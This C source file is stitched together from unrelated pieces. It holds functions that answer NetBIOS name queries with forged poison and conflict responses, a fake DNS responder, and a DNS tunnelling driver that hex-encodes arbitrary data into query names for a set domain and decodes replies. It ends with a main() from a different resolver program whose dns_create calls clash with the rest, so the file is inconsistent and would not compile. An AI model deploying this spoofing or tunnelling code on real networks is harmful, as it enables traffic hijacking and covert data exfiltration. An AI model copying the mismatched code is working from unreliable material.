static void register_send(settings_t *settings)
{
dns_t *dns;
uint8_t *packet;
uint32_t packet_length;
/* Create the DNS object. */
dns = dns_create();
dns->flags = FLAGS_R_REQUEST | FLAGS_NM_RD | FLAGS_NM_B;
if(settings->query_type == TYPE_REGISTER)
dns->flags = FLAGS_OPCODE_NAME_REGISTRATION;
else if(settings->query_type == TYPE_REFRESH)
dns->flags = FLAGS_OPCODE_NAME_REFRESH;
else if(settings->query_type == TYPE_RELEASE)
dns->flags = FLAGS_OPCODE_NAME_RELEASE;
else
fprintf(stderr, "Unknown query type made it into register_send() -- %d\n", settings->query_type);
dns->trn_id = 0x1337;
/* Add the question/additional. */
dns_add_netbios_question(dns, settings->name, settings->name_type, NULL, DNS_TYPE_NB, 0x0001);
dns_add_additional_NB(dns, settings->name, settings->name_type, NULL, 0x0001, 0, 0x0000, settings->source);
/* Convert the DNS object to a packet. */
packet = dns_to_packet(dns, &packet_length);
dns_destroy(dns);
/* Put it on the wire. */
fprintf(stderr, "Sending query.\n");
udp_send(settings->socket, settings->target, settings->port, packet, packet_length);
safe_free(packet);
}
static void send_conflict_response(settings_t *settings, int socket, char *addr, uint16_t port, char *name, uint8_t name_type, uint16_t trn_id)
{
dns_t *response = dns_create();
uint8_t *packet;
uint32_t packet_length;
fprintf(stderr, "Replying to registration request for '%s<%02x>' with a conflict (%s)\n", name, name_type, settings->source);
response->trn_id = trn_id;
response->flags = FLAGS_R_RESPONSE | FLAGS_OPCODE_NAME_REGISTRATION | FLAGS_NM_AA | FLAGS_NM_RD | FLAGS_NM_RA | FLAGS_RCODE_ACT_ERR;
dns_add_answer_NB(response, name, name_type, NULL, 1, 0, 0x0000, settings->source ? settings->source : "0.0.0.0");
packet = dns_to_packet(response, &packet_length);
dns_destroy(response);
udp_send(socket, addr, port, packet, packet_length);
safe_free(packet);
}
static void send_poison_response(settings_t *settings, int socket, char *addr, uint16_t port, char *name, uint8_t name_type, uint16_t trn_id)
{
dns_t *response = dns_create();
uint8_t *packet;
uint32_t packet_length;
fprintf(stderr, "Replying to request for '%s<%02x>' with %s\n", name, name_type, settings->source);
response->trn_id = trn_id;
response->flags = FLAGS_R_RESPONSE | FLAGS_OPCODE_QUERY | FLAGS_NM_AA | FLAGS_NM_RD;
dns_add_answer_NB(response, name, name_type, NULL, 1, 0, 0x0000, settings->source);
packet = dns_to_packet(response, &packet_length);
dns_destroy(response);
udp_send(socket, addr, port, packet, packet_length);
safe_free(packet);
}
static SELECT_RESPONSE_t nb_recv_callback(void *group, int s, uint8_t *data, size_t length, char *addr, uint16_t port, void *param)
{
settings_t *settings = (settings_t*) param;
uint16_t i;
dns_t *dns = dns_create_from_packet(data, length);
printf("Received a query from %s:%d:\n", addr, port);
for(i = 0; i < dns->question_count; i++)
{
if(dns->questions[i].type == DNS_TYPE_NB)
{
char decoded_name[16];
uint8_t type;
NB_print_question(dns->questions[i], dns->flags);
NB_decode_name(dns->questions[i].name, decoded_name, &type);
if(should_poison(settings, dns->flags, decoded_name, addr))
send_poison_response(settings, s, addr, port, decoded_name, type, dns->trn_id);
if(should_conflict(settings, dns->flags, decoded_name, addr))
send_conflict_response(settings, s, addr, port, decoded_name, type, dns->trn_id);
}
else if(dns->questions[i].type == DNS_TYPE_NBSTAT)
{
NBSTAT_print_question(dns->questions[i], dns->flags);
}
else
{
fprintf(stderr, "Unknown NetBIOS question: 0x%04x\n", dns->questions[i].type);
}
}
printf("\n");
dns_destroy(dns);
return SELECT_OK;
}
static void query_send(settings_t *settings)
{
dns_t *dns;
uint8_t *packet;
uint32_t packet_length;
/* Create the DNS object. */
dns = dns_create();
dns->flags = FLAGS_R_REQUEST | FLAGS_OPCODE_QUERY | FLAGS_NM_B;
dns->trn_id = 0x1337;
/* Add the question. */
dns_add_netbios_question(dns, settings->name, settings->name_type, NULL, settings->query_type == TYPE_QUERY_NB ? DNS_TYPE_NB : DNS_TYPE_NBSTAT, 0x0001);
/* Convert the DNS object to a packet. */
packet = dns_to_packet(dns, &packet_length);
dns_destroy(dns);
/* Put it on the wire. */
fprintf(stderr, "Sending query.\n");
udp_send(settings->socket, settings->target, settings->port, packet, packet_length);
safe_free(packet);
}
static SELECT_RESPONSE_t dns_callback(void *group, int socket, uint8_t *packet, size_t packet_length, char *addr, uint16_t port, void *s)
{
settings_t *settings = (settings_t*) s;
dns_t *response;
uint8_t *response_packet;
uint32_t response_packet_length;
/* Parse the DNS packet. */
dns_t *request = dns_create_from_packet(packet, packet_length);
/* Create the response packet. */
response = dns_create();
response->trn_id = request->trn_id;
response->flags = 0x8000;
if(request->question_count > 0)
{
int i;
/* Display the questions. */
for(i = 0; i < request->question_count; i++)
{
/* Grab the question and display it. */
question_t this_question = request->questions[i];
fprintf(stderr, "Question %d: %s (0x%04x 0x%04x)\n", i, this_question.name, this_question.type, this_question.class);
/* Add an answer, if appropriate. */
dns_add_question(response, this_question.name, this_question.type, this_question.class);
if(settings->A && (this_question.type == DNS_TYPE_A || this_question.type == DNS_TYPE_ANY))
{
fprintf(stderr, "(Responding with %s)\n", settings->A);
dns_add_answer_A(response, this_question.name, 0x0001, settings->TTL, settings->A);
}
#ifndef WIN32
else if(settings->AAAA && this_question.type == DNS_TYPE_AAAA)
{
fprintf(stderr, "(Responding with %s)\n", settings->AAAA);
dns_add_answer_AAAA(response, this_question.name, 0x0001, settings->TTL, settings->AAAA);
}
#endif
}
/* If we have any answers, send back our packet. */
if(response->answer_count > 0)
{
/* Send the packet. */
response_packet = dns_to_packet(response, &response_packet_length);
udp_send(socket, addr, port, response_packet, response_packet_length);
}
else
{
/* Send back an error. */
response_packet = dns_create_error_string(request->trn_id, request->questions[0], &response_packet_length);
udp_send(socket, addr, port, response_packet, response_packet_length);
}
/* Delete the response. */
safe_free(response_packet);
dns_destroy(response);
/* Delete the request. */
dns_destroy(request);
}
/* This function expects to receive the proper length of data. */
static void handle_packet_out(driver_dns_t *driver, uint8_t *data, size_t length)
{
size_t i;
dns_t *dns;
buffer_t *buffer;
uint8_t *encoded_bytes;
size_t encoded_length;
uint8_t *dns_bytes;
size_t dns_length;
size_t section_length;
assert(driver->s != -1); /* Make sure we have a valid socket. */
assert(data); /* Make sure they aren't trying to send NULL. */
assert(length > 0); /* Make sure they aren't trying to send 0 bytes. */
assert(length <= MAX_DNSCAT_LENGTH(driver->domain));
buffer = buffer_create(BO_BIG_ENDIAN);
/* If no domain is set, add the wildcard prefix at the start. */
if(!driver->domain)
{
buffer_add_bytes(buffer, (uint8_t*)WILDCARD_PREFIX, strlen(WILDCARD_PREFIX));
buffer_add_int8(buffer, '.');
}
section_length = 0;
/* TODO: I don't much care for this loop... */
for(i = 0; i < length; i++)
{
char hex_buf[3];
#ifdef WIN32
sprintf_s(hex_buf, 3, "%02x", data[i]);
#else
sprintf(hex_buf, "%02x", data[i]);
#endif
buffer_add_bytes(buffer, hex_buf, 2);
/* Add periods when we need them. */
section_length += 2;
if(i + 1 != length && section_length + 2 >= MAX_FIELD_LENGTH)
{
section_length = 0;
buffer_add_int8(buffer, '.');
}
}
/* If a domain is set, instead of the wildcard prefix, add the domain to the end. */
if(driver->domain)
{
buffer_add_int8(buffer, '.');
buffer_add_bytes(buffer, driver->domain, strlen(driver->domain));
}
buffer_add_int8(buffer, '\0');
/* Get the result out. */
encoded_bytes = buffer_create_string_and_destroy(buffer, &encoded_length);
/* Double-check we didn't mess up the length. */
assert(encoded_length <= MAX_DNS_LENGTH);
dns = dns_create(_DNS_OPCODE_QUERY, _DNS_FLAG_RD, _DNS_RCODE_SUCCESS);
dns_add_question(dns, (char*)encoded_bytes, driver->type, _DNS_CLASS_IN);
dns_bytes = dns_to_packet(dns, &dns_length);
LOG_INFO("Sending DNS query for: %s to %s:%d", encoded_bytes, driver->dns_host, driver->dns_port);
udp_send(driver->s, driver->dns_host, driver->dns_port, dns_bytes, dns_length);
safe_free(dns_bytes);
safe_free(encoded_bytes);
dns_destroy(dns);
}
static SELECT_RESPONSE_t recv_socket_callback(void *group, int s, uint8_t *data, size_t length, char *addr, uint16_t port, void *param)
{
/*driver_dns_t *driver_dns = param;*/
dns_t *dns = dns_create_from_packet(data, length);
driver_dns_t *driver = (driver_dns_t*) param;
LOG_INFO("DNS response received (%d bytes)", length);
/* TODO */
if(dns->rcode != _DNS_RCODE_SUCCESS)
{
/* TODO: Handle errors more gracefully */
switch(dns->rcode)
{
case _DNS_RCODE_FORMAT_ERROR:
LOG_ERROR("DNS: RCODE_FORMAT_ERROR");
break;
case _DNS_RCODE_SERVER_FAILURE:
LOG_ERROR("DNS: RCODE_SERVER_FAILURE");
break;
case _DNS_RCODE_NAME_ERROR:
LOG_ERROR("DNS: RCODE_NAME_ERROR");
break;
case _DNS_RCODE_NOT_IMPLEMENTED:
LOG_ERROR("DNS: RCODE_NOT_IMPLEMENTED");
break;
case _DNS_RCODE_REFUSED:
LOG_ERROR("DNS: RCODE_REFUSED");
break;
default:
LOG_ERROR("DNS: Unknown error code (0x%04x)", dns->rcode);
break;
}
}
else if(dns->question_count != 1)
{
LOG_ERROR("DNS returned the wrong number of response fields (question_count should be 1, was instead %d).", dns->question_count);
LOG_ERROR("This is probably due to a DNS error");
}
else if(dns->answer_count < 1)
{
LOG_ERROR("DNS didn't return an answer");
LOG_ERROR("This is probably due to a DNS error");
}
else
{
size_t i;
uint8_t *answer = NULL;
size_t answer_length = 0;
dns_type_t type = dns->answers[0].type;
if(type == _DNS_TYPE_TEXT)
{
/* Get the answer. */
answer = dns->answers[0].answer->TEXT.text;
answer_length = dns->answers[0].answer->TEXT.length;
LOG_INFO("Received a TXT response (%zu bytes)", answer_length);
/* Decode it. */
answer = buffer_decode_hex(answer, &answer_length);
}
else if(type == _DNS_TYPE_CNAME)
{
/* Get the answer. */
answer = remove_domain((char*)dns->answers[0].answer->CNAME.name, driver->domain);
answer_length = strlen((char*)answer);
LOG_INFO("Received a CNAME response (%zu bytes)", answer_length);
/* Decode it. */
answer = buffer_decode_hex(answer, &answer_length);
}
else if(type == _DNS_TYPE_MX)
{
/* Get the answer. */
answer = remove_domain((char*)dns->answers[0].answer->MX.name, driver->domain);
answer_length = strlen((char*)answer);
LOG_INFO("Received a MX response (%zu bytes)", answer_length);
/* Decode it. */
answer = buffer_decode_hex(answer, &answer_length);
}
else if(type == _DNS_TYPE_A)
{
buffer_t *buf = buffer_create(BO_BIG_ENDIAN);
qsort(dns->answers, dns->answer_count, sizeof(answer_t), cmpfunc_a);
for(i = 0; i < dns->answer_count; i++)
buffer_add_bytes(buf, dns->answers[i].answer->A.bytes + 1, 3);
answer_length = buffer_read_next_int8(buf);
LOG_INFO("Received an A response (%zu bytes)", answer_length);
answer = safe_malloc(answer_length);
buffer_read_bytes_at(buf, 1, answer, answer_length);
}
#ifndef WIN32
else if(type == _DNS_TYPE_AAAA)
{
buffer_t *buf = buffer_create(BO_BIG_ENDIAN);
qsort(dns->answers, dns->answer_count, sizeof(answer_t), cmpfunc_aaaa);
for(i = 0; i < dns->answer_count; i++)
buffer_add_bytes(buf, dns->answers[i].answer->AAAA.bytes + 1, 15);
answer_length = buffer_read_next_int8(buf);
LOG_INFO("Received an AAAA response (%zu bytes)", answer_length);
answer = safe_malloc(answer_length);
buffer_read_bytes_at(buf, 1, answer, answer_length);
}
#endif
else
{
LOG_ERROR("Unknown DNS type returned: %d", type);
answer = NULL;
}
if(answer)
{
/*LOG_WARNING("Received a %zu-byte DNS response: %s [0x%04x]", answer_length, answer, type);*/
/* Pass the buffer to the caller */
if(answer_length > 0)
{
/* Pass the data elsewhere. */
message_post_packet_in(answer, answer_length);
}
safe_free(answer);
}
}
dns_destroy(dns);
return SELECT_OK;
}
int main (int argc, char **argv)
{
int opt;
enum log_level log_level = LOG_LEVEL;
int err = 0;
struct event_main *event_main;
struct options options = {
.resolver = "localhost",
};
while ((opt = getopt_long(argc, argv, "hqvdR:", long_options, NULL)) >= 0) {
switch (opt) {
case 'h':
help(argv[0]);
return 0;
case 'q':
log_level = LOG_ERROR;
break;
case 'v':
log_level = LOG_INFO;
break;
case 'd':
log_level = LOG_DEBUG;
break;
case 'R':
options.resolver = optarg;
break;
default:
help(argv[0]);
return 1;
}
}
// apply
log_set_level(log_level);
if ((err = event_main_create(&event_main))) {
log_fatal("event_main_create");
goto error;
}
if ((err = dns_create(event_main, &options.dns, options.resolver))) {
log_fatal("dns_create: %s", options.resolver);
goto error;
}
while (optind < argc && !err) {
struct dns_task task = {
.options = &options,
.arg = argv[optind++],
};
// start async task
if ((err = event_start(event_main, dns, &task))) {
log_fatal("event_start: %s", task.arg);
}
}
// mainloop
if ((err = event_main_run(event_main))) {
log_fatal("event_main");
}
error:
if (options.dns)
dns_destroy(options.dns);
return err;
}
